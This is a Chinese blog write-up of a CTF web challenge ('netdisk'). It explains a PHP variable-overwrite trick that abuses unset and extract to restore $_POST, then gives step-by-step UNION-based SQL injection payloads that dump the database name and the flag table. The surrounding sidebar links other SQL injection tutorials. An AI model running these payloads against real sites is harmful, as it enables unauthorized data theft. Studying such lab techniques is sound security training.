千毒网盘

GNSS数据处理(一)——开源软件RTKLIB与G-Nut/Anubis实战入门 本文详细介绍了GNSS数据处理的开源软件RTKLIB与G-Nut/Anubis的实战入门指南。从软件安装、数据获取到静态短基线解算,逐步讲解操作技巧与常见问题排查,帮助测绘与地质监测人员快速掌握GNSS数据处理技术,提升工作效率。 阅读详情

先查看code.php中这一段的源码(注释是我自己写的),可以测试提交$file_code中数组的值。
在这里插入图片描述
测试结果如下图
在这里插入图片描述
猜测flag可能会通过提交正确的提取码显示在这个位置。

然后看index.php页面查看源码,发现许多函数不认识,查了相关资料说是变量覆盖。可查看文章https://www.cnblogs.com/test404/p/9779235.html
在这里插入图片描述
还是没能完全理解,我自己写的一个类似的代码在本地测试。
由于array中的内容是_GET和_POST,所以先尝试用GET提交。

<?php
foreach(array('_GET','_POST','_COOKIE') as $key){	

print_r($$key); 
echo "<br>";
foreach($$key as $key_2 => $value_2) {
	
	print_r($$key_2);
	echo "<br>";
	print_r($value_2);
	echo "<br>";		
	var_dump($$key_2==$value_2);echo "<br>";       
	#var_dump() 函数用于输出变量的相关信息 
	}
}
?>

如下图,出现bool(false),
在这里插入图片描述
看显示位置属于这条代码

foreach($$key as $key_2 => $value_2) {	
	print_r($$key_2);

如果是以_GET传入的话,最终得到的结果是false,试试以_POST传入
在这里插入图片描述
发现结果为true。所以post提交可行。

然后看下面一段代码

if($$key) {
					foreach($$key as $key_2 => $value_2) {   
						if(isset($$key_2) and $$key_2 == $value_2) 
							unset($$key_2); 
					}

这一段表示如果变量key_2(即上文数组中第二个值post)的值已经被设置并且等于value_2的值,则删除变量key_2。

if(isset($_POST['code'])) $_POST['code'] = $pan->filter($_POST['code']);

这一句表示如果POST变量被设置然后将POST的值传入filter函数并执行,但是上一句删除了POST变量,所以这一句执行不了。这就是变量覆盖。
所以为了能够提交POST,我们必须使得它能恢复执行。
下面两句源码就可做到。

if($_GET) extract($_GET, EXTR_SKIP);
if($_POST) extract($_POST, EXTR_SKIP);

extract该函数使用数组键名作为变量名,使用数组键值作为变量值。
extract(_POST, EXTR_SKIP)数组中的键名_POST直接注册为变量,否则跳过。
所以这里执行之后$_POST变量就又回来了。

执行extract()之前,可搜索进入_GET数组的键名内容是_POST,_POST数组则不存在,_GET数组的键名内容是_POST,所以也就是导入了名为_POST的变量,也就是_POST变量,所以$_POST成功被还原。

然后在code.php文件中发现sql语句,要绕过单引号,然后进行SQL注入得到flag。

 $sql = "select * from file where code='$code'";

所以利用联合查询语句进行测试。

首先利用万能密码测试发现成功绕过。
在这里插入图片描述
然后开始爆出字段

?_POST[code]=114514' order by 3%23
DATA:
code=114514' order by 3%23

测试到4时报错,所以有2个字段
在这里插入图片描述
在这里插入图片描述

爆回显位置

?_POST[code]=114514' and 0=1 union select 1,database()%23
DATA:
code=114514' and 0=1 union select 1,database()%23

在这里插入图片描述
所以回显位是2

所以数据库是supersqli

爆表名
爆字段

爆值
直接查flag表flag字段

?_POST[code]=114514' and 0=1 union select 1,2,flag from flag%23
DATA:
code=114514' and 0=1 union select 1,2,flag from flag%23

在这里插入图片描述

Verilog-asm小练习—PLL建模 Verilog- ams是Verilog标准的模拟混合信号语言,以下是对PLL建模的一种思路参考 阅读详情

相关推荐

【webrtc】openh264编码:动态配置码控参数触发IDR编码

SetRates 下发RateControlParameters 给到openh264 编码器 void SetRates(const RateControlParameters& parameters) override; LayerConfig 编码器这边的配置是layerconfig,具体到层的: std::vector<LayerConfig> configurations_; void H264EncoderImpl::SetRates(const RateCo.

突围 684

网盘(第六届上海市大学生网络安全大赛)

网盘 源码泄露 web1.zip 代码审计 分析index.php和code.php的重要代码 index.php: <?php include 'code.php'; #GET: ?_POST[code]=114514'payload POST: code=114514'payload $pan = new Pan(); foreach(array('_GET', '_POST', '_COOKIE') as $key) #

qq_46485934的博客 661

Rockchip开发系列 - 3.4.GPIO扩展芯片AW95xx和PCA953X(2)

Rockchip开发系列 - 3.3.GPIO扩展芯片AW95xx和PCA953X(2)

fulinux的博客 920

第六届上海市大学生网络安全大赛 | Wp

文章目录MISC0x00:签到0x01:pcapWeb0x01:网盘 MISC 0x00:签到 linux运行一下即可得到flag 0x01:pcap 提示:请分析附件中的dnp3协议 Web 0x01:网盘 这个题有源码泄露 http://eci-2ze636qtsw50d6niueft.cloudeci1.ichunqiu.com/www.zip 在code.php文件中发现sql语句,做题的时候没有观察到index.php文件中的变量覆盖,一直以为是要绕过单引号,然后进行SQL注入得

Lemon's blog 1605

2020全国大学生网安邀请赛暨第六届上海市大学生网安大赛-网盘

文章目录网盘HelloTryToLogin 网盘 根目录/www.zip有源码 index.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/bootstra

末初 · mochu7 1919

第五届上海市大学生网络安全大赛

web web刷的题目还是太少了,SQL注入和SSTI的一些常见姿势,利用链都不知道,Orz 网盘 扫描目录可以发现网站备份,下载得源码,进行代码审计 首先发现了SQL语句,肯定要想到注入 发现有过滤,直接绕这个过滤语句肯定绕不过去(引号都过滤了orz),所以再看看别的点 发现在过滤语句下面可以进行变量覆盖,后面参数为EXTR_SKIP,所以就不能覆盖已有的变量 但是想要注入就必须在$_POST[‘code’]上下手,而$_POST变量在程序运行时会自动创建. 这时候看到最上面有个unse

lonmar的博客 1124

2020 上海市网络安全大赛 web

文章目录网盘in_array绕过变量覆盖联合注入布尔盲注hello注入点绕过与利用 网盘 题目是后期复现的,无js,页面较丑 打开题目,直接看到一个表单,发现存在备份文件www.zip 发现index.php和code.php in_array绕过 先看code.php的getfile函数,此函数处理的是传入的参数进入数据库查询下载直链的过程,这里发现传入并没有经过任何的过滤,明显的存在SQL注入 public function getfile() {

qq_45691294的博客 2076

第六届上海市大学生网络安全大赛__网盘

网盘 复现题目,变量销毁和变量重置,sql注入(本地环境有点问题) 文章目录网盘源码泄露变量销毁和变量重置sql注入参考链接 源码泄露 源码泄露,找到www.zip,下载,里面有两个文件,index.php和code.php index.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, in

Sk1y的博客 1238

网盘

这段时间发现了一个好的免费存储空间-网盘:1、优点如下:1、支持下载文件第三方连接(传说中的支持外链)。2、文件永久保存。3、在脑空间能够实现协同办公,对于普通的文档用户,可以实现移动办公。4、最大的优点:可以让注册用户赚钱:文件上传到网盘共享文件夹内,然后把获得的文件共享链接贴到博客、QQ、论坛等。。。可让别人下载,如果有人下载,你还能赚钱!根据官方介绍文件被独立I

New World 4741

【免费下载】 IDM+盘:解锁高速下载互联网资源的终极攻略

IDM+盘:解锁高速下载互联网资源的终极攻略 【下载地址】IDM盘高速下载互联网资源攻略 在快速变化的数字化世界里,高效下载成为日常需求。本文旨在分享一套结合IDM(Internet Download Manager)与盘工具,实现高速下载互联网资源,包括百度网盘中大文件的方法。这套方法特别适用于需要快速获取各类资...

gitblog_06572的博客 1449

2026年夸克网盘 Skill 安装教程:Codex、问、WorkBuddy、OpenClaw 接入夸克网盘教程

2026年夸克网盘 Skill让 AI Agent 直接连接你的网盘文件。过去我们使用网盘,更多是解决“文件存在哪里”的问题。文件在哪里?文件是什么?怎么快速找到?怎么整理?怎么分析?这些问题都可以交给 AI Agent 参与处理。尤其是对于经常使用Codex、问、WorkBuddy、OpenClawAI Agent夸克网盘个人文件库形成一个更加完整的 AI 文件管理工作流。① 获取夸克网盘 Skill② 转存到自己的夸克网盘③ 打开支持 Skill 的 AI Agent。

heikejiruanjian的博客 938

城通网盘军万马,网盘,119g网盘哪个适合做网赚?

转载请注明文章来自 [ofiicexie] 网盘网赚已经流行了有一段时间了,国内流行的几个网盘有城通,军万马,脑,119g,今天小编写以此文来比较分析一下这几个网盘的优缺点。 这里,我特意做了个这几个网盘的对比表格让大家能一目了然 网盘名称 城通网盘 军万马 网盘 119g 容量大小(免费用户) 400g 5g 20g 119g 续期...

weixin_30820151的博客 965

SQL注入之手工注入

SQL注入从注入的手法或者工具上分类的话可以分为:     ·手工注入(手工来构造调试输入payload)   ·工具注入(使用工具,如sqlmap) 今天就给大家说一下手工注入:    手工注入流程 判断注入点 注入的第一步是得判断该处是否是一个注入点。或者说判断此处是否有SQL注入漏洞。最简单的判断方法就是在正常的参数后加单引号'。id=1' 以看到数据库报错...

weixin_44906495的博客 633

web渗透部分笔记(一)

web渗透笔记

学吧 612

SQL(四)

(2)Refer注入攻击的原理是通过篡改Referer字段中的值,将恶意的SQL代码插入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。4.注意:我们在发送HTTP请求时,发现游览器将我们的cookie都进行了携带(注意:游览器只会携带在当前请求的url中包含了该cookie中path值的cookie),并且是以key:value的形式进行表示的。id=1" -D sqli --tables 爆表。其实cookie注入与传统的SQL注入基本上是一样,都是针对数据库的注入,就是注入的。

2302_80935968的博客 1090

SQL注入知识总结

目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...

ma963852的博客 1万+

SQL注入-可回显】报错注入:简介、相关函数、利用方法

SQL注入-可回显】

2452

sql注入

取数据库security中users表的username列和password列,**计算这两列的内容长度之和,最后判断长度是否等于10。由图可知,数据库security中,user表有很多列。8.由图可知,我们就知道security数据库中,所有的账号和密码,例如账号(Dumb)和密码(Dumb),显示出数据库security中,user表的username列和password列,中间用id列隔开。由图可知,我们就知道security数据库中,所有的账号和密码,例如账号(Dumb)和密码(Dumb)

weixin_50473876的博客 427

sqli-labs第一关:有回显位的提示信息注入

sqli-labs第一关:有回显位的提示信息注入 (一到四关的注入方式类似,只是SQL语句的闭合方式不同) 第一步:直接输入网址: 127.0.0.1/sqli-labs-master/Less-1/ 第二步:设置id=1,确定是否与数据库有交互 127.0.0.1/sqli-labs-master/Less-1/?id=1 第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示 http:

m0_51395584的博客 738

回显是什么鬼?浅谈

linux c 里面出现了一个叫做tcgetattr 和tcsetattr的两个函数  他们的功能能是获取回显位 以及设置回显位 详解http://blog.chinaunix.net/uid-10747583-id-97303.html 那么什么是回显? 你在键盘上按下一个“键”,如果在电脑上同时显示出你按的内容,这就是回显;如果没有显示,就不回显。 典型的两个

一只叫做Unix的猫 1万+

sql-联合查询

查询当前数据表中列数 id=1' order by 4--+ 联合查询注入数据库 显示回显位置 id=-1' union select 1,2,3--+ 注意:这里显示回显位置为第二列和第三列,因此在第一列进行操作时不会产生回显。 查询当前数据库名称,当前连接数据库使用者,以及数据库版本号。 id=-1’ union select 1,2,(select databaes())--+ id=-1’ union select 1,(select user()),3--+ 注意: 1.用联合查询进行注

weixin_54217950的博客 1886

盘解析[JIE版]百网盘在线解析

// ==UserScript== // @name 盘解析[JIE版] // @author JIEMO // @description 百网盘在线解析 // @version 1.7.0 // @namespace https://greasyfork.org/users/158417 // @match *://pan.baidu.com/s/* // @match *://pan.baidu.com/share/* //

qq_43439832的博客 1745

STM32F40x-Standard-Library-V1.9.0.7z

该资源名称为 STM32F40x_Standard_Library_V1.9.0.7z该资源为 STM32F4 系列 MCU 芯片的标准库该资源的版本号为 1.9.0,是目前官方发布的最新标准STM32 标准库更贴近单片机底层,是对 STM32 寄存器一系列操作的原始封装,编译后得到的 bin 文件,较其他库而言,文件会更小,所有功能函数的调用需要自己安排,适合用于学习外设流程化配置,以及外设运行原理,唯一的遗憾就是目前官方推出了HAL库,标准库不再被维护更新

软件工程 教辅+部分答案

软件工程(原书第10版)没有中文版教辅,只有英文版教辅和答案,下载时请注意!

上一篇: BUU[极客大挑战]LoveSQL
下一篇: 文件包含漏洞及漏洞利用
曦枳icon.
博客等级 码龄6年 19粉丝 23原创
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值